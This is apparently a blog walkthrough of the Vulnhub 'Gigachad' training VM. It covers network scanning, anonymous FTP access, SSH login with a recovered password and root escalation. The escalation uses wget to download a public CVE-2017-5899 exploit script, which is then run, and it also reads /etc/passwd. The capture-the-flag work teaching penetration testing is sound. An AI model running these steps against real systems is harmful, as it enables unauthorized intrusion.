Gigachad -: (Vulnhub) Walkthrough

Pulkit Marele
3 min readApr 26, 2021

--

I personally enjoyed playing with this box, this box taught me how to stay focused while doing enumeration and exploitation. There’s so much going on with this box for post exploitation. let’s pwn it ..!!!

Here is the link to downlaod this VM:-

https://www.vulnhub.com/entry/gigachad-1,657/

Network Scanning

We always start with network scanning, Let’s find the target IP address by running netdiscover.

┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0

As we saw in netdiscover result. Our target ip address is 192.168.250.187

Enumeration/Reconnaissance

Our next step is scanning the target machine. let’s start with nmap.

┌─[✗]─[root@RDX]─[~]
└──╼ #nmap -v -sT 192.168.250.187 -p-

┌─[root@RDX]─[~]
└──╼ #nmap -v -sT -sV -A -O 192.168.250.187 -p-

So we can see 3 ports are open and in port number 21 , anonymous login of ftp is allowed, So let’s see what’s there in it

user — ftp

password — any email

┌─[root@RDX]─[~]
└──╼ #ftp 192.168.250.187

ftp> ls

ftp> get chadinfo

ftp> exit

┌─[root@RDX]─[~]
└──╼ #cat chadinfo

http://192.168.250.187/drippinchad.png

Wo wo wo ,so we can see there’s a pic ,and yea this place’s name might be the pass ,so let’s see this image in Google image

username = chad
password = maidenstower

┌─[root@RDX]─[~]
└──╼ #ssh chad@192.168.250.187

chad@gigachad:~$ id

chad@gigachad:~$ cat /etc/passwd

chad@gigachad:~$ ls

chad@gigachad:~$ cat user.txt

I got the User Flag

Privilege Escalation

chad@gigachad:~$ find / -perm -u=s -type f 2>/dev/null

https://github.com/bcoles/local-exploits/blob/master/CVE-2017-5899/exploit.sh

chad@gigachad:~$ wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh

chad@gigachad:~$ ls

chad@gigachad:~$ chmod +x exploit.sh

chad@gigachad:~$ ./exploit.sh

# bash

root@gigachad:/root# cd /root

root@gigachad:/root# ls

root@gigachad:/root# cat root.txt

Successfully got the root privilege and the ‘root.txt’ .

--

--

No responses yet